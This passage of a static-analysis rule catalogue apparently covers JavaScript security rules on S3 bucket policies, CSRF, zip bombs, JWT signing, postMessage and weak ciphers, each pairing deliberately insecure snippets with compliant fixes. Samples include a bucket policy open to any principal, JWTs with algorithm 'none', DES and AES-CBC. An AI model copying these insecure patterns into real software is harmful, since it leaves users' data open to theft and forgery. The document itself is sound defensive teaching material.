  • The AWS resource stores or processes sensitive data.
  • The AWS resource is designed to be private.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It’s recommended to implement the least privilege principle, i.e. to grant necessary permissions only to users for their required tasks. In the context of resource-based policies, list the principals that need the access and grant to them only the required privileges.

Sensitive Code Example

This policy allows all users, including anonymous ones, to access an S3 bucket:

import { aws_iam as iam } from 'aws-cdk-lib'
import { aws_s3 as s3 } from 'aws-cdk-lib'

const bucket = new s3.Bucket(this, "ExampleBucket")

bucket.addToResourcePolicy(new iam.PolicyStatement({
    effect: iam.Effect.ALLOW,
    actions: ["s3:*"],
    resources: [bucket.arnForObjects("*")],
    principals: [new iam.AnyPrincipal()] // Sensitive
}))

Compliant Solution

This policy allows only the authorized users:

import { aws_iam as iam } from 'aws-cdk-lib'
import { aws_s3 as s3 } from 'aws-cdk-lib'

const bucket = new s3.Bucket(this, "ExampleBucket")

bucket.addToResourcePolicy(new iam.PolicyStatement({
    effect: iam.Effect.ALLOW,
    actions: ["s3:*"],
    resources: [bucket.arnForObjects("*")],
    principals: [new iam.AccountRootPrincipal()]
}))

See

javascript:S6249

By default, S3 buckets can be accessed through HTTP and HTTPs protocols.

As HTTP is a clear-text protocol, it lacks the encryption of transported data, as well as the capability to build an authenticated connection. It means that a malicious actor who is able to intercept traffic from the network can read, modify or corrupt the transported content.

Ask Yourself Whether

  • The S3 bucket stores sensitive information.
  • The infrastructure has to comply with AWS Foundational Security Best Practices standard.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It’s recommended to enforce HTTPS only access by setting enforceSSL property to true

Sensitive Code Example

S3 bucket objects access through TLS is not enforced by default:

const s3 = require('aws-cdk-lib/aws-s3');

const bucket = new s3.Bucket(this, 'example'); // Sensitive

Compliant Solution

const s3 = require('aws-cdk-lib/aws-s3');

const bucket = new s3.Bucket(this, 'example', {
    bucketName: 'example',
    versioned: true,
    publicReadAccess: false,
    enforceSSL: true
});

See

javascript:S4502

A cross-site request forgery (CSRF) attack occurs when a trusted user of a web application can be forced, by an attacker, to perform sensitive actions that he didn’t intend, such as updating his profile or sending a message, more generally anything that can change the state of the application.

The attacker can trick the user/victim to click on a link, corresponding to the privileged action, or to visit a malicious web site that embeds a hidden web request and as web browsers automatically include cookies, the actions can be authenticated and sensitive.

Ask Yourself Whether

  • The web application uses cookies to authenticate users.
  • There exist sensitive operations in the web application that can be performed when the user is authenticated.
  • The state / resources of the web application can be modified by doing HTTP POST or HTTP DELETE requests for example.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Protection against CSRF attacks is strongly recommended:
    • to be activated by default for all unsafe HTTP methods.
    • implemented, for example, with an unguessable CSRF token
  • Of course all sensitive operations should not be performed with safe HTTP methods like GET which are designed to be used only for information retrieval.

Sensitive Code Example

Express.js CSURF middleware protection is not found on an unsafe HTTP method like POST method:

let csrf = require('csurf');
let express = require('express');

let csrfProtection = csrf({ cookie: true });

let app = express();

// Sensitive: this operation doesn't look like protected by CSURF middleware (csrfProtection is not used)
app.post('/money_transfer', parseForm, function (req, res) {
  res.send('Money transferred');
});

Protection provided by Express.js CSURF middleware is globally disabled on unsafe methods:

let csrf = require('csurf');
let express = require('express');

app.use(csrf({ cookie: true, ignoreMethods: ["POST", "GET"] })); // Sensitive as POST is unsafe method

Compliant Solution

Express.js CSURF middleware protection is used on unsafe methods:

let csrf = require('csurf');
let express = require('express');

let csrfProtection = csrf({ cookie:  true });

let app = express();

app.post('/money_transfer', parseForm, csrfProtection, function (req, res) { // Compliant
  res.send('Money transferred')
});

Protection provided by Express.js CSURF middleware is enabled on unsafe methods:

let csrf = require('csurf');
let express = require('express');

app.use(csrf({ cookie: true, ignoreMethods: ["GET"] })); // Compliant

See

javascript:S6245

Server-side encryption (SSE) encrypts an object (not the metadata) as it is written to disk (where the S3 bucket resides) and decrypts it as it is read from disk. This doesn’t change the way the objects are accessed, as long as the user has the necessary permissions, objects are retrieved as if they were unencrypted. Thus, SSE only helps in the event of disk thefts, improper disposals of disks and other attacks on the AWS infrastructure itself.

There are three SSE options:

  • Server-Side Encryption with Amazon S3-Managed Keys (SSE-S3)
    • AWS manages encryption keys and the encryption itself (with AES-256) on its own.
  • Server-Side Encryption with Customer Master Keys (CMKs) Stored in AWS Key Management Service (SSE-KMS)
    • AWS manages the encryption (AES-256) of objects and encryption keys provided by the AWS KMS service.
  • Server-Side Encryption with Customer-Provided Keys (SSE-C)
    • AWS manages only the encryption (AES-256) of objects with encryption keys provided by the customer. AWS doesn’t store the customer’s encryption keys.

Ask Yourself Whether

  • The S3 bucket stores sensitive information.
  • The infrastructure needs to comply to some regulations, like HIPAA or PCI DSS, and other standards.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It’s recommended to use SSE. Choosing the appropriate option depends on the level of control required for the management of encryption keys.

Sensitive Code Example

Server-side encryption is not used:

const s3 = require('aws-cdk-lib/aws-s3');

new s3.Bucket(this, 'id', {
    bucketName: 'default'
}); // Sensitive

Bucket encryption is disabled by default.

Compliant Solution

Server-side encryption with Amazon S3-Managed Keys is used:

const s3 = require('aws-cdk-lib/aws-s3');

new s3.Bucket(this, 'id', {
    encryption: s3.BucketEncryption.KMS_MANAGED
});

# Alternatively with a KMS key managed by the user.

new s3.Bucket(this, 'id', {
    encryption: s3.BucketEncryption.KMS_MANAGED,
    encryptionKey: access_key
});

See

javascript:S4507

Development tools and frameworks usually have options to make debugging easier for developers. Although these features are useful during development, they should never be enabled for applications deployed in production. Debug instructions or error messages can leak detailed information about the system, like the application’s path or file names.

Ask Yourself Whether

  • The code or configuration enabling the application debug features is deployed on production servers or distributed to end users.
  • The application runs by default with debug features activated.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Do not enable debugging features on production servers or applications distributed to end users.

Sensitive Code Example

errorhandler Express.js middleware should not be used in production:

const express = require('express');
const errorhandler = require('errorhandler');

let app = express();
app.use(errorhandler()); // Sensitive

Compliant Solution

errorhandler Express.js middleware used only in development mode:

const express = require('express');
const errorhandler = require('errorhandler');

let app = express();

if (process.env.NODE_ENV === 'development') {
  app.use(errorhandler());
}

See

javascript:S5604

Powerful features are browser features (geolocation, camera, microphone …​) that can be accessed with JavaScript API and may require a permission granted by the user. These features can have a high impact on privacy and user security thus they should only be used if they are really necessary to implement the critical parts of an application.

This rule highlights intrusive permissions when requested with the future standard (but currently experimental) web browser query API and specific APIs related to the permission. It is highly recommended to customize this rule with the permissions considered as intrusive in the context of the web application.

Ask Yourself Whether

  • Some powerful features used by the application are not really necessary.
  • Users are not clearly informed why and when powerful features are used by the application.

You are at risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • In order to respect user privacy it is recommended to avoid using intrusive powerful features.

Sensitive Code Example

When using geolocation API, Firefox for example retrieves personal information like nearby wireless access points and IP address and sends it to the default geolocation service provider, Google Location Services:

navigator.permissions.query({name:"geolocation"}).then(function(result) {
});  // Sensitive: geolocation is a powerful feature with high privacy concerns

navigator.geolocation.getCurrentPosition(function(position) {
  console.log("coordinates x="+position.coords.latitude+" and y="+position.coords.longitude);
}); // Sensitive: geolocation is a powerful feature with high privacy concerns

Compliant Solution

If geolocation is required, always explain to the user why the application needs it and prefer requesting an approximate location when possible:

<html>
<head>
    <title>
        Retailer website example
    </title>
</head>
<body>
    Type a city, street or zip code where you want to retrieve the closest retail locations of our products:
    <form method=post>
        <input type=text value="New York"> <!-- Compliant -->
    </form>
</body>
</html>

See

javascript:S5725

Using remote artifacts without integrity checks can lead to the unexpected execution of malicious code in the application.

On the client side, where front-end code is executed, malicious code could:

  • impersonate users' identities and take advantage of their privileges on the application.
  • add quiet malware that monitors users' session and capture sensitive secrets.
  • gain access to sensitive clients' personal data.
  • deface, or otherwise affect the general availability of the application.
  • mine cryptocurrencies in the background.

Likewise, a compromised software piece that would be deployed on a server-side application could badly affect the application’s security. For example, server-side malware could:

  • access and modify sensitive technical and business data.
  • elevate its privileges on the underlying operating system.
  • Use the compromised application as a pivot to attack the local network.

By ensuring that a remote artifact is exactly what it is supposed to be before using it, the application is protected from unexpected changes applied to it before it is downloaded.
Especially, integrity checks will allow for identifying an artifact replaced by malware on the publication website or that was legitimately changed by its author, in a more benign scenario.

Important note: downloading an artifact over HTTPS only protects it while in transit from one host to another. It provides authenticity and integrity checks for the network stream only. It does not ensure the authenticity or security of the artifact itself.

Ask Yourself Whether

  • The artifact is a file intended to execute code.
  • The artifact is a file that is intended to configure or affect running code in some way.

There is a risk if you answered yes to any of these questions.

Recommended Secure Coding Practices

To check the integrity of a remote artifact, hash verification is the most reliable solution. It does ensure that the file has not been modified since the fingerprint was computed.

In this case, the artifact’s hash must:

  • Be computed with a secure hash algorithm such as SHA512, SHA384 or SHA256.
  • Be compared with a secure hash that was not downloaded from the same source.

To do so, the best option is to add the hash in the code explicitly, by following Mozilla’s official documentation on how to generate integrity strings.

Note: Use this fix together with version binding on the remote file. Avoid downloading files named "latest" or similar, so that the front-end pages do not break when the code of the latest remote artifact changes.

Sensitive Code Example

The following code sample uses neither integrity checks nor version pinning:

let script = document.createElement("script");
script.src = "https://cdn.example.com/latest/script.js"; // Sensitive
script.crossOrigin = "anonymous";
document.head.appendChild(script);

Compliant Solution

let script = document.createElement("script");
script.src = "https://cdn.example.com/v5.3.6/script.js";
script.integrity = "sha384-oqVuAfXRKap7fdgcCY5uykM6+R9GqQ8K/uxy9rx7HNQlGYl1kPzQho1wx4JwY8wC";
script.crossOrigin = "anonymous";
document.head.appendChild(script);

See

javascript:S5728

Content security policy (CSP) (fetch directives) is a W3C standard which is used by a server to specify, via a http header, the origins from where the browser is allowed to load resources. It can help to mitigate the risk of cross site scripting (XSS) attacks and reduce privileges used by an application. If the website doesn’t define CSP header the browser will apply same-origin policy by default.

Content-Security-Policy: default-src 'self'; script-src ‘self ‘ http://www.example.com

In the above example, all resources are allowed from the website where this header is set and script resources fetched from example.com are also authorized:

<img src="selfhostedimage.png></script> <!-- will be loaded because default-src 'self'; directive is applied  -->
<img src="http://www.example.com/image.png></script>  <!-- will NOT be loaded because default-src 'self'; directive is applied  -->
<script src="http://www.example.com/library.js></script> <!-- will be loaded because script-src ‘self ‘ http://www.example.comdirective is applied  -->
<script src="selfhostedscript.js></script> <!-- will be loaded because script-src ‘self ‘ http://www.example.com directive is applied  -->
<script src="http://www.otherexample.com/library.js></script> <!-- will NOT be loaded because script-src ‘self ‘ http://www.example.comdirective is applied  -->

Ask Yourself Whether

  • The resources of the application are fetched from various untrusted locations.

There is a risk if you answered yes to this question.

Recommended Secure Coding Practices

Implement content security policy fetch directives, in particular default-src directive and continue to properly sanitize and validate all inputs of the application, indeed CSP fetch directives is only a tool to reduce the impact of cross site scripting attacks.

Sensitive Code Example

In a Express.js application, the code is sensitive if the helmet contentSecurityPolicy middleware is disabled:

const express = require('express');
const helmet = require('helmet');

let app = express();
app.use(
    helmet({
      contentSecurityPolicy: false, // sensitive
    })
);

Compliant Solution

In a Express.js application, a standard way to implement CSP is the helmet contentSecurityPolicy middleware:

const express = require('express');
const helmet = require('helmet');

let app = express();
app.use(helmet.contentSecurityPolicy()); // Compliant

See

javascript:S5042

Successful Zip Bomb attacks occur when an application expands untrusted archive files without controlling the size of the expanded data, which can lead to denial of service. A Zip bomb is usually a malicious archive file of a few kilobytes of compressed data but turned into gigabytes of uncompressed data. To achieve this extreme compression ratio, attackers will compress irrelevant data (eg: a long string of repeated bytes).

Ask Yourself Whether

Archives to expand are untrusted and:

  • There is no validation of the number of entries in the archive.
  • There is no validation of the total size of the uncompressed data.
  • There is no validation of the ratio between the compressed and uncompressed archive entry.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Define and control the ratio between compressed and uncompressed data, in general the data compression ratio for most of the legit archives is 1 to 3.
  • Define and control the threshold for maximum total size of the uncompressed data.
  • Count the number of file entries extracted from the archive and abort the extraction if their number is greater than a predefined threshold, in particular it’s not recommended to recursively expand archives (an entry of an archive could be also an archive).

Sensitive Code Example

For tar module:

const tar = require('tar');

tar.x({ // Sensitive
  file: 'foo.tar.gz'
});

For adm-zip module:

const AdmZip = require('adm-zip');

let zip = new AdmZip("./foo.zip");
zip.extractAllTo("."); // Sensitive

For jszip module:

const fs = require("fs");
const JSZip = require("jszip");

fs.readFile("foo.zip", function(err, data) {
  if (err) throw err;
  JSZip.loadAsync(data).then(function (zip) { // Sensitive
    zip.forEach(function (relativePath, zipEntry) {
      if (!zip.file(zipEntry.name)) {
        fs.mkdirSync(zipEntry.name);
      } else {
        zip.file(zipEntry.name).async('nodebuffer').then(function (content) {
          fs.writeFileSync(zipEntry.name, content);
        });
      }
    });
  });
});

For yauzl module

const yauzl = require('yauzl');

yauzl.open('foo.zip', function (err, zipfile) {
  if (err) throw err;

  zipfile.on("entry", function(entry) {
    zipfile.openReadStream(entry, function(err, readStream) {
      if (err) throw err;
      // TODO: extract
    });
  });
});

For extract-zip module:

const extract = require('extract-zip')

async function main() {
  let target = __dirname + '/test';
  await extract('test.zip', { dir: target }); // Sensitive
}
main();

Compliant Solution

For tar module:

const tar = require('tar');
const MAX_FILES = 10000;
const MAX_SIZE = 1000000000; // 1 GB

let fileCount = 0;
let totalSize = 0;

tar.x({
  file: 'foo.tar.gz',
  filter: (path, entry) => {
    fileCount++;
    if (fileCount > MAX_FILES) {
      throw 'Reached max. number of files';
    }

    totalSize += entry.size;
    if (totalSize > MAX_SIZE) {
      throw 'Reached max. size';
    }

    return true;
  }
});

For adm-zip module:

const AdmZip = require('adm-zip');
const MAX_FILES = 10000;
const MAX_SIZE = 1000000000; // 1 GB
const THRESHOLD_RATIO = 10;

let fileCount = 0;
let totalSize = 0;
let zip = new AdmZip("./foo.zip");
let zipEntries = zip.getEntries();
zipEntries.forEach(function(zipEntry) {
    fileCount++;
    if (fileCount > MAX_FILES) {
        throw 'Reached max. number of files';
    }

    let entrySize = zipEntry.getData().length;
    totalSize += entrySize;
    if (totalSize > MAX_SIZE) {
        throw 'Reached max. size';
    }

    let compressionRatio = entrySize / zipEntry.header.compressedSize;
    if (compressionRatio > THRESHOLD_RATIO) {
        throw 'Reached max. compression ratio';
    }

    if (!zipEntry.isDirectory) {
        zip.extractEntryTo(zipEntry.entryName, ".");
    }
});

For jszip module:

const fs = require("fs");
const pathmodule = require("path");
const JSZip = require("jszip");

const MAX_FILES = 10000;
const MAX_SIZE = 1000000000; // 1 GB

let fileCount = 0;
let totalSize = 0;
let targetDirectory = __dirname + '/archive_tmp';

fs.readFile("foo.zip", function(err, data) {
  if (err) throw err;
  JSZip.loadAsync(data).then(function (zip) {
    zip.forEach(function (relativePath, zipEntry) {
      fileCount++;
      if (fileCount > MAX_FILES) {
        throw 'Reached max. number of files';
      }

      // Prevent ZipSlip path traversal (S6096)
      const resolvedPath = pathmodule.join(targetDirectory, zipEntry.name);
      if (!resolvedPath.startsWith(targetDirectory)) {
        throw 'Path traversal detected';
      }

      if (!zip.file(zipEntry.name)) {
        fs.mkdirSync(resolvedPath);
      } else {
        zip.file(zipEntry.name).async('nodebuffer').then(function (content) {
          totalSize += content.length;
          if (totalSize > MAX_SIZE) {
            throw 'Reached max. size';
          }

          fs.writeFileSync(resolvedPath, content);
        });
      }
    });
  });
});

Be aware that due to the similar structure of sensitive and compliant code the issue will be raised in both cases. It is up to the developer to decide if the implementation is secure.

For yauzl module

const yauzl = require('yauzl');

const MAX_FILES = 10000;
const MAX_SIZE = 1000000000; // 1 GB
const THRESHOLD_RATIO = 10;

yauzl.open('foo.zip', function (err, zipfile) {
  if (err) throw err;

  let fileCount = 0;
  let totalSize = 0;

  zipfile.on("entry", function(entry) {
    fileCount++;
    if (fileCount > MAX_FILES) {
      throw 'Reached max. number of files';
    }

    // The uncompressedSize comes from the zip headers, so it might not be trustworthy.
    // Alternatively, calculate the size from the readStream.
    let entrySize = entry.uncompressedSize;
    totalSize += entrySize;
    if (totalSize > MAX_SIZE) {
      throw 'Reached max. size';
    }

    if (entry.compressedSize > 0) {
      let compressionRatio = entrySize / entry.compressedSize;
      if (compressionRatio > THRESHOLD_RATIO) {
        throw 'Reached max. compression ratio';
      }
    }

    zipfile.openReadStream(entry, function(err, readStream) {
      if (err) throw err;
      // TODO: extract
    });
  });
});

Be aware that due to the similar structure of sensitive and compliant code the issue will be raised in both cases. It is up to the developer to decide if the implementation is secure.

For extract-zip module:

const extract = require('extract-zip')

const MAX_FILES = 10000;
const MAX_SIZE = 1000000000; // 1 GB
const THRESHOLD_RATIO = 10;

async function main() {
  let fileCount = 0;
  let totalSize = 0;

  let target = __dirname + '/foo';
  await extract('foo.zip', {
    dir: target,
    onEntry: function(entry, zipfile) {
      fileCount++;
      if (fileCount > MAX_FILES) {
        throw 'Reached max. number of files';
      }

      // The uncompressedSize comes from the zip headers, so it might not be trustworthy.
      // Alternatively, calculate the size from the readStream.
      let entrySize = entry.uncompressedSize;
      totalSize += entrySize;
      if (totalSize > MAX_SIZE) {
        throw 'Reached max. size';
      }

      if (entry.compressedSize > 0) {
        let compressionRatio = entrySize / entry.compressedSize;
        if (compressionRatio > THRESHOLD_RATIO) {
          throw 'Reached max. compression ratio';
        }
      }
    }
  });
}
main();

See

javascript:S6252

S3 buckets can be versioned. When the S3 bucket is unversioned it means that a new version of an object overwrites an existing one in the S3 bucket.

It can lead to unintentional or intentional information loss.

Ask Yourself Whether

  • The bucket stores information that require high availability.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It’s recommended to enable S3 versioning and thus to have the possibility to retrieve and restore different versions of an object.

Sensitive Code Example

const s3 = require('aws-cdk-lib/aws-s3');

new s3.Bucket(this, 'id', {
    bucketName: 'bucket',
    versioned: false // Sensitive
});

The default value of versioned is false so the absence of this parameter is also sensitive.

Compliant Solution

const s3 = require('aws-cdk-lib/aws-s3');

new s3.Bucket(this, 'id', {
    bucketName: 'bucket',
    versioned: true
});

See

javascript:S5659

This vulnerability allows forging of JSON Web Tokens to impersonate other users.

Why is this an issue?

JSON Web Tokens (JWTs), a popular method of securely transmitting information between parties as a JSON object, can become a significant security risk when they are not properly signed with a robust cipher algorithm, left unsigned altogether, or if the signature is not verified. This vulnerability class allows malicious actors to craft fraudulent tokens, effectively impersonating user identities. In essence, the integrity of a JWT hinges on the strength and presence of its signature.

What is the potential impact?

When a JSON Web Token is not appropriately signed with a strong cipher algorithm or if the signature is not verified, it becomes a significant threat to data security and the privacy of user identities.

Impersonation of users

JWTs are commonly used to represent user authorization claims. They contain information about the user’s identity, user roles, and access rights. When these tokens are not securely signed, it allows an attacker to forge them. In essence, a weak or missing signature gives an attacker the power to craft a token that could impersonate any user. For instance, they could create a token for an administrator account, gaining access to high-level permissions and sensitive data.

Unauthorized data access

When a JWT is not securely signed, it can be tampered with by an attacker, and the integrity of the data it carries cannot be trusted. An attacker can manipulate the content of the token and grant themselves permissions they should not have, leading to unauthorized data access.

How to fix it in jsonwebtoken

Code examples

The following code contains examples of JWT encoding and decoding without a strong cipher algorithm.

Noncompliant code example

const jwt = require('jsonwebtoken');

jwt.sign(payload, key, { algorithm: 'none' }); // Noncompliant
const jwt = require('jsonwebtoken');

jwt.verify(token, key, {
    expiresIn: 360000,
    algorithms: ['none'] // Noncompliant
}, callbackcheck);

Compliant solution

const jwt = require('jsonwebtoken');

jwt.sign(payload, key, { algorithm: 'HS256' });
const jwt = require('jsonwebtoken');

jwt.verify(token, key, {
    expiresIn: 360000,
    algorithms: ['HS256']
}, callbackcheck);

How does this work?

Always sign your tokens

The foremost measure to enhance JWT security is to ensure that every JWT you issue is signed. Unsigned tokens are like open books that anyone can tamper with. Signing your JWTs ensures that any alterations to the tokens after they have been issued can be detected. Most JWT libraries support a signing function, and using it is usually as simple as providing a secret key when the token is created.

Choose a strong cipher algorithm

It is not enough to merely sign your tokens. You need to sign them with a strong cipher algorithm. Algorithms like HS256 (HMAC using SHA-256) are considered secure for most purposes. But for an additional layer of security, you could use an algorithm like RS256 (RSA Signature with SHA-256), which uses a private key for signing and a public key for verification. This way, even if someone gains access to the public key, they will not be able to forge tokens.

Verify the signature of your tokens

Resolving a vulnerability concerning the validation of JWT token signatures is mainly about incorporating a critical step into your process: validating the signature every time a token is decoded. Just having a signed token using a secure algorithm is not enough. If you are not validating signatures, they are not serving their purpose.

Every time your application receives a JWT, it needs to decode the token to extract the information contained within. It is during this decoding process that the signature of the JWT should also be checked.

To resolve the issue follow these instructions:

  1. Use framework-specific functions for signature verification: Most programming frameworks that support JWTs provide specific functions to not only decode a token but also validate its signature simultaneously. Make sure to use these functions when handling incoming tokens.
  2. Handle invalid signatures appropriately: If a JWT’s signature does not validate correctly, it means the token is not trustworthy, indicating potential tampering. The action to take on encountering an invalid token should be denying the request carrying it and logging the event for further investigation.
  3. Incorporate signature validation in your tests: When you are writing tests for your application, include tests that check the signature validation functionality. This can help you catch any instances where signature verification might be unintentionally skipped or bypassed.

By following these practices, you can ensure the security of your application’s JWT handling process, making it resistant to attacks that rely on tampering with tokens. Validation of the signature needs to be an integral and non-negotiable part of your token handling process.

Going the extra mile

Securely store your secret keys

Ensure that your secret keys are stored securely. They should not be hard-coded into your application code or checked into your version control system. Instead, consider using environment variables, secure key management systems, or vault services.

Rotate your secret keys

Even with the strongest cipher algorithms, there is a risk that your secret keys may be compromised. Therefore, it is a good practice to periodically rotate your secret keys. By doing so, you limit the amount of time that an attacker can misuse a stolen key. When you rotate keys, be sure to allow a grace period where tokens signed with the old key are still accepted to prevent service disruptions.

Resources

Standards

javascript:S2819

Why is this an issue?

Browsers allow message exchanges between Window objects of different origins.

Because any window can send or receive messages from another window, it is important to verify the sender’s/receiver’s identity:

  • When sending a message with the postMessage method, the identity’s receiver should be defined (the wildcard keyword (*) should not be used).
  • When receiving a message with a message event, the sender’s identity should be verified using the origin and possibly source properties.

Noncompliant code example

When sending a message:

var iframe = document.getElementById("testiframe");
iframe.contentWindow.postMessage("secret", "*"); // Noncompliant: * is used

When receiving a message:

window.addEventListener("message", function(event) { // Noncompliant: no checks are done on the origin property.
      console.log(event.data);
 });

Compliant solution

When sending a message:

var iframe = document.getElementById("testsecureiframe");
iframe.contentWindow.postMessage("hello", "https://secure.example.com"); // Compliant

When receiving a message:

window.addEventListener("message", function(event) {

  if (event.origin !== "http://example.org") // Compliant
    return;

  console.log(event.data)
});

Resources

javascript:S5547

This vulnerability makes it possible that the cleartext of the encrypted message might be recoverable without prior knowledge of the key.

Why is this an issue?

Encryption algorithms are essential for protecting sensitive information and ensuring secure communication in various domains. They are used for several important reasons:

  • Confidentiality, privacy, and intellectual property protection.
  • Security during transmission or on storage devices.
  • Data integrity, general trust, and authentication.

When selecting encryption algorithms, tools, or combinations, you should also consider two things:

  1. No encryption is unbreakable.
  2. The strength of an encryption algorithm is usually measured by the effort required to crack it within a reasonable time frame.

For these reasons, as soon as cryptography is included in a project, it is important to choose encryption algorithms that are considered strong and secure by the cryptography community.

What is the potential impact?

The cleartext of an encrypted message might be recoverable. Additionally, it might be possible to modify the cleartext of an encrypted message.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Theft of sensitive data

The encrypted message might contain data that is considered sensitive and should not be known to third parties.

By using a weak algorithm the likelihood that an attacker might be able to recover the cleartext drastically increases.

Additional attack surface

By modifying the cleartext of the encrypted message it might be possible for an attacker to trigger other vulnerabilities in the code. Encrypted values are often considered trusted, since under normal circumstances it would not be possible for a third party to modify them.

How to fix it in Node.js

Code examples

The following code contains examples of algorithms that are not considered highly resistant to cryptanalysis and thus should be avoided.

Noncompliant code example

const crypto = require('crypto');

crypto.createCipheriv("DES", key, iv); // Noncompliant

Compliant solution

const crypto = require('crypto');

crypto.createCipheriv("AES-256-GCM", key, iv);

How does this work?

Use a secure algorithm

It is highly recommended to use an algorithm that is currently considered secure by the cryptographic community. A common choice for such an algorithm is the Advanced Encryption Standard (AES).

For block ciphers, it is not recommended to use algorithms with a block size that is smaller than 128 bits.

Resources

Standards

javascript:S5542

This vulnerability exposes encrypted data to a number of attacks whose goal is to recover the plaintext.

Why is this an issue?

Encryption algorithms are essential for protecting sensitive information and ensuring secure communications in a variety of domains. They are used for several important reasons:

  • Confidentiality, privacy, and intellectual property protection
  • Security during transmission or on storage devices
  • Data integrity, general trust, and authentication

When selecting encryption algorithms, tools, or combinations, you should also consider two things:

  1. No encryption is unbreakable.
  2. The strength of an encryption algorithm is usually measured by the effort required to crack it within a reasonable time frame.

For these reasons, as soon as cryptography is included in a project, it is important to choose encryption algorithms that are considered strong and secure by the cryptography community.

For AES, the weakest modes are CBC (Cipher Block Chaining) and ECB

(Electronic Codebook), as they are either vulnerable to padding oracles or do not provide authentication mechanisms.

And for RSA, the weakest algorithms are either using it without padding or using the PKCS1v1.5 padding scheme.

What is the potential impact?

The cleartext of an encrypted message might be recoverable. Additionally, it might be possible to modify the cleartext of an encrypted message.

Below are some real-world scenarios that illustrate possible impacts of an attacker exploiting the vulnerability.

Theft of sensitive data

The encrypted message might contain data that is considered sensitive and should not be known to third parties.

By using a weak algorithm the likelihood that an attacker might be able to recover the cleartext drastically increases.

Additional attack surface

By modifying the cleartext of the encrypted message it might be possible for an attacker to trigger other vulnerabilities in the code. Encrypted values are often considered trusted, since under normal circumstances it would not be possible for a third party to modify them.

How to fix it in Node.js

Code examples

Noncompliant code example

Example with a symmetric cipher, AES:

const crypto = require('crypto');

crypto.createCipheriv("AES-128-CBC", key, iv); // Noncompliant

Compliant solution

Example with a symmetric cipher, AES:

const crypto = require('crypto');

crypto.createCipheriv("AES-256-GCM", key, iv);

How does this work?

As a rule of thumb, use the cryptographic algorithms and mechanisms that are considered strong by the cryptographic community.

Appropriate choices are currently the following.

For AES: Use Galois/Counter mode (GCM)

GCM mode combines encryption with authentication and integrity checks using a cryptographic hash function and provides both confidentiality and authenticity of data.

Other similar modes are:

  • CCM: Counter with CBC-MAC
  • CWC: Cipher Block Chaining with Message Authentication Code
  • EAX: Encrypt-and-Authenticate
  • IAPM: Integer Authenticated Parallelizable Mode
  • OCB: Offset Codebook Mode

It is also possible to use AES-CBC with HMAC for integrity checks. However, it

is considered more straightforward to use AES-GCM directly instead.

For RSA: use the OAEP scheme

The Optimal Asymmetric Encryption Padding scheme (OAEP) adds randomness and a secure hash function that strengthens the regular inner workings of RSA.

Resources

Articles & blog posts

Standards

javascript:S4787

This rule is deprecated; use S4426, S5542, S5547 instead.

Encrypting data is security-sensitive. It has led in the past to the following vulnerabilities:

Proper encryption requires both the encryption algorithm and the key to be strong. Obviously the private key needs to remain secret and be renewed regularly. However these are not the only means to defeat or weaken an encryption.

This rule flags function calls that initiate encryption/decryption.

Ask Yourself Whether

  • the private key might not be random, strong enough or the same key is reused for a long long time.
  • the private key might be compromised. It can happen when it is stored in an unsafe place or when it was transferred in an unsafe manner.
  • the key exchange is made without properly authenticating the receiver.
  • the encryption algorithm is not strong enough for the level of protection required. Note that encryption algorithms strength decreases as time passes.
  • the chosen encryption library is deemed unsafe.
  • a nonce is used, and the same value is reused multiple times, or the nonce is not random.
  • the RSA algorithm is used, and it does not incorporate an Optimal Asymmetric Encryption Padding (OAEP), which might weaken the encryption.
  • the CBC (Cypher Block Chaining) algorithm is used for encryption, and it’s IV (Initialization Vector) is not generated using a secure random algorithm, or it is reused.
  • the Advanced Encryption Standard (AES) encryption algorithm is used with an unsecure mode. See the recommended practices for more information.

You are at risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Generate encryption keys using secure random algorithms.
  • When generating cryptographic keys (or key pairs), it is important to use a key length that provides enough entropy against brute-force attacks. For the Blowfish algorithm the key should be at least 128 bits long, while for the RSA algorithm it should be at least 2048 bits long.
  • Regenerate the keys regularly.
  • Always store the keys in a safe location and transfer them only over safe channels.
  • If there is an exchange of cryptographic keys, check first the identity of the receiver.
  • Only use strong encryption algorithms. Check regularly that the algorithm is still deemed secure. It is also imperative that they are implemented correctly. Use only encryption libraries which are deemed secure. Do not define your own encryption algorithms as they will most probably have flaws.
  • When a nonce is used, generate it randomly every time.
  • When using the RSA algorithm, incorporate an Optimal Asymmetric Encryption Padding (OAEP).
  • When CBC is used for encryption, the IV must be random and unpredictable. Otherwise it exposes the encrypted value to crypto-analysis attacks like "Chosen-Plaintext Attacks". Thus a secure random algorithm should be used. An IV value should be associated to one and only one encryption cycle, because the IV’s purpose is to ensure that the same plaintext encrypted twice will yield two different ciphertexts.
  • The Advanced Encryption Standard (AES) encryption algorithm can be used with various modes. Galois/Counter Mode (GCM) with no padding should be preferred to the following combinations which are not secured:
    • Electronic Codebook (ECB) mode: Under a given key, any given plaintext block always gets encrypted to the same ciphertext block. Thus, it does not hide data patterns well. In some senses, it doesn’t provide serious message confidentiality, and it is not recommended for use in cryptographic protocols at all.
    • Cipher Block Chaining (CBC) with PKCS#5 padding (or PKCS#7) is susceptible to padding oracle attacks.

Sensitive Code Example

// === Client side ===
crypto.subtle.encrypt(algo, key, plainData); // Sensitive
crypto.subtle.decrypt(algo, key, encData); // Sensitive
// === Server side ===
const crypto = require("crypto");
const cipher = crypto.createCipher(algo, key); // Sensitive
const cipheriv = crypto.createCipheriv(algo, key, iv); // Sensitive
const decipher = crypto.createDecipher(algo, key); // Sensitive
const decipheriv = crypto.createDecipheriv(algo, key, iv); // Sensitive
const pubEnc = crypto.publicEncrypt(key, buf); // Sensitive
const privDec = crypto.privateDecrypt({ key: key, passphrase: secret }, pubEnc); // Sensitive
const privEnc = crypto.privateEncrypt({ key: key, passphrase: secret }, buf); // Sensitive
const pubDec = crypto.publicDecrypt(key, privEnc); // Sensitive

See

javascript:S4423

This vulnerability exposes encrypted data to a number of attacks whose goal is to recover the plaintext.

Why is this an issue?

